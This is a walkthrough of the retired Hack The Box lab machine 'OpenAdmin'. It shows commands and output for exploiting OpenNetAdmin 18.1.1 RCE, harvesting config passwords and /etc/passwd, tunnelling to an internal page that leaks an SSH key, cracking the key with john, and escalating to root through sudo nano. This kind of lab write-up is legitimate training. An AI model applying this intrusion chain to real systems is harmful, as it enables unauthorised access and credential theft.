HTB Walkthrough: OpenAdmin w/o Metasploit (retired)
OpenAdmin is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.
Hostname: OpenAdmin| Difficulty Level: Easy | Operating System: Linux
Nmap Scan
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# nmap -sC -sV -oA OpenAdmin 10.10.10.171
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–01 18:22 EDT
Nmap scan report for 10.10.10.171
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration & Exploit
Adding ‘openadmin.htb 10.10.10.171’ in /etc/hosts/. Browsing to http://openadmin.htb/ona/ reveals a ‘Open Net Admin’ portal. You are logged in by default as guest. The version is ‘OpenNetAdmin — v18.1.1’. Looking for Open Net Admin exploit.
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# searchsploit Open Net Admin
OpenNetAdmin 18.1.1 — Remote Code Execution.
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# searchsploit -m php/webapps/47691.sh
Removing carriage returns
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# cat 47691.sh | tr -d ‘\r’ >> rce.sh
Exploiting and getting a reverse shell back.
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# ./rce.sh http://openadmin.htb/ona/
$ whoami
www-data
User privilege escalation (www-data →jimmy)
$ grep -Ri “password” config
config/auth_ldap.config.php://$conf[‘auth’][‘ldap’][‘bindpw’] = ‘mysecretbindpassword’;
Looking for users:
$ cat /etc/passwd
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
We need to know the file path to view the contents.
$ ls config
auth_ldap.config.php
config.inc.php
We came to know that another config folder exists within local folder by reviewing ‘config/config.inc.php’.
$ cat config/config.inc.php
/local/config/config.inc.php
/local/config/database_settings.inc.php$ cat local/config/database_settings.inc.php
array (
‘db_type’ => ‘mysqli’,
‘db_host’ => ‘localhost’,
‘db_login’ => ‘ona_sys’,
‘db_passwd’ => ‘n1nj4W4rri0R!’,
‘db_database’ => ‘ona_default’,
‘db_debug’ => false,
),
Using above db password, you can ssh into ‘jimmy’ user. We need to escalate our privileges to joanna for user flag.
User privilege escalation (jimmy →joanna)
jimmy@openadmin:/var/www/internal$ cat index.php
if ($_POST[‘username’] == ‘jimmy’ && hash(‘sha512’,$_POST[‘password’]) == ‘00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1’)jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION[‘username’])) { header(“Location: /index.php”); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec(‘cat /home/joanna/.ssh/id_rsa’);
echo “<pre>$output</pre>”;
?>
<html>
<h3>Don’t forget your “ninja” password</h3>
Click here to logout <a href=”logout.php” tite = “Logout”>Session
</html>
From above script, it will probably display ssh key when you browse index.php page. Looking for more info on what exactly to browse. As it is present inside ‘internal’
jimmy@openadmin:/var/www/html$ ss -ln | grep LISTEN
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
From above we should try SSH port forwarding.
┌──(root💀kali)-[~]
└─# ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171 -N
Browse to http://127.0.0.1:52846 and enter jimmy/Revealed, you will get in. The page displays the ssh key belonging to joanna as seen from ‘/var/www/internal/main.php’.
Save the private key on kali as id_rsa. Let us extract the password from private key.
(a) Create john tool compatible hash and save the output in a file (id_john)
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# python /usr/share/john/ssh2john.py id_rsa
(b) Cracking the password
┌──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# john id_john — wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press ‘q’ or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2021–06–03 17:56) 0.1321g/s 1894Kp/s 1894Kc/s 1894KC/sa6_123..*7¡Vamos!
Session completed
SSH into the box using joanna’s credential + ssh key.
──(root💀kali)-[/home/kali/labs/HTB/OpenAdmin]
└─# ssh -i id_rsa joanna@openadmin.htb
Note: It will throw error permissions and you will get access denied if key permissions are too open. Use ‘chmod 600 <private key>’
You will get user flag.
Privilege Escalation
Checking for sudo privileges
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
As we can see that nano can be used to attain root privileges via sudo. Google search for nano gtfobins and refer this link: https://gtfobins.github.io/gtfobins/nano/#sudo
We are going to follow steps mentioned in ‘Sudo’ section as we are exploiting sudo privileges.
joanna@openadmin:~$ sudo /bin/nano /opt/priv
In file, enter ‘CTRL+R’ then ‘CTRL+X’
^R^X
At the bottom, a small dialog opens saying command to enter. Enter below:
reset; sh 1>&0 2>&0
You will get root shell + root flag.
Note: Shell appears right after the command. You will see a ‘#’ symbol once exploit is successful.
